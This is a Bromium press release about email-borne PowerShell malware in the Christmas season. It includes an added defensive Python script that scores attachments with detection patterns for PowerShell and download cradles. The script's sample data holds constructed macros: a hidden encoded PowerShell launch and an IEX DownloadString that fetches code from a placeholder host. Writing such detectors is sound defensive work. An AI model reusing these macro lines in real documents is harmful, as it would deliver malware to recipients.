Bromium, Inc., the pioneer and leader in application isolation and containment for endpoint protection that stops advanced malware attacks, has warned organisations of the threat posed by hackers delivering malware via email attachments in the run up to Christmas. This comes after Bromium recorded a spike in the number of malicious files sent via email from October to December 2018.
Analysis of malware captured in Bromium micro-VMs found that cybercriminals are also beginning to mix and match tactics, targeting users with emails that contain malicious attachments, phishing links and drive-by download links.
The analysis showed:
- 88% of threats were delivered via email, compared to just 12% from downloadable files
- Attackers are attaching Word-borne PowerShell attacks to emails, using generic file names such as ‘Invoice 0034989’ and ‘Order 9923144’. These documents contain hidden PowerShell commands that evade detection and drop malicious payloads, exploiting a powerful built-in feature of Windows that is virtually guaranteed to be present on victims’ systems
- The average employee opens five attachments per day, which equates to 300,000 per month for a 2,000-person organisation
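The attachment pattern described above (a generically named Office document whose macro launches PowerShell) is something a mail gateway or triage script can score before delivery. The following is an added example written for this page, not Bromium's code or data: it assumes a macro extractor has already handed over the VBA text for each attachment, and the attachment records, filenames and indicator patterns are constructed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class Attachment:
    filename: str
    macro_text: str  # VBA/script text recovered by a macro extractor; "" if the file has no macro


# Generic "Invoice NNNN" / "Order NNNN" style names on Office or RTF files (constructed pattern).
GENERIC_NAME = re.compile(
    r"^(invoice|order|receipt|payment|statement|po)[ _-]?\d{4,}\.(docx?|docm|rtf|xlsx?|xlsm)$",
    re.IGNORECASE,
)

# Indicators that a macro hands control to PowerShell or another interpreter.
# Each is a hypothetical detection rule; tune thresholds to your own false-positive rate.
SCRIPT_INDICATORS = {
    "powershell_invocation": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "encoded_command": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"download(string|file)|net\.webclient|invoke-webrequest", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "vba_shell_call": re.compile(r"\b(shell|createobject)\s*\(", re.I),
}


def analyse(att: Attachment) -> dict:
    """Score one attachment and return a verdict with the reasons behind it."""
    reasons = []
    if GENERIC_NAME.match(att.filename):
        reasons.append("generic_invoice_or_order_filename")
    if att.macro_text:
        reasons.append("contains_macro")
        for name, pattern in SCRIPT_INDICATORS.items():
            if pattern.search(att.macro_text):
                reasons.append(name)

    hits = [r for r in reasons if r in SCRIPT_INDICATORS]
    if hits and ("powershell_invocation" in hits or len(hits) >= 2):
        verdict = "block"        # macro clearly launches a script: never deliver
    elif hits or ("contains_macro" in reasons and "generic_invoice_or_order_filename" in reasons):
        verdict = "detonate"     # weak signals: open in isolation/sandbox before delivery
    else:
        verdict = "deliver"
    return {"filename": att.filename, "verdict": verdict, "reasons": reasons}


def triage(attachments) -> dict:
    """Map each filename to its verdict for the whole batch."""
    return {a.filename: analyse(a)["verdict"] for a in attachments}


# Constructed sample batch (not real malware; the encoded payload and URL are placeholders).
SAMPLES = [
    Attachment(
        "Invoice 0034989.doc",
        'Sub AutoOpen()\n'
        '  Set sh = CreateObject("WScript.Shell")\n'
        '  sh.Run "powershell -w hidden -enc <BASE64_PLACEHOLDER>", 0\n'
        'End Sub',
    ),
    Attachment(
        "Order 9923144.docm",
        'Sub Document_Open()\n'
        '  MsgBox "Please enable content to view this order."\n'
        'End Sub',
    ),
    Attachment("Q4_headcount.xlsx", ""),
    Attachment(
        "meeting_notes.docm",
        'Sub AutoOpen()\n'
        "  cmd = \"IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER.invalid/s')\"\n"
        '  Shell(cmd)\n'
        'End Sub',
    ),
]

if __name__ == "__main__":
    for att in SAMPLES:
        result = analyse(att)
        print(f"{result['verdict']:9} {result['filename']:22} {', '.join(result['reasons'])}")
```

The filename pattern on its own is only a weak signal (legitimate invoices use the same names), so the script treats it as a reason to detonate in isolation rather than to block; only a macro that demonstrably reaches PowerShell or a download cradle is blocked outright.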
Michael Rosen, Senior Threat Researcher at Bromium, commented: “Last Christmas, hackers were using e-cards to slip past security tools undetected; this year, PowerShell exploits are their weapon of choice. Significantly, these attacks were caught by Bromium after they had bypassed anti-virus, firewalls and other detection-based security tools. This really shows that traditional detection-based solutions are just not up to the challenge of protecting the enterprise – too much is slipping through the net.”
The data shows that the focus on email attachments might be seasonal, as the figures contrast sharply with the first quarter of the year – when 83% of threats came from downloads. Rosen concluded: “Hackers are clever, but they are also focused on RoI. If it works, they will keep doing it until security tools wake up and start blocking them – when that happens, they simply shift gears and the whole cycle starts again. Security teams need to stop chasing hackers from one vector to the next and instead protect against everything. The only way they can do this is through protection within a layered cybersecurity stack that utilises virtualisation to protect organisations from threats, regardless of the wrapping used by hackers.”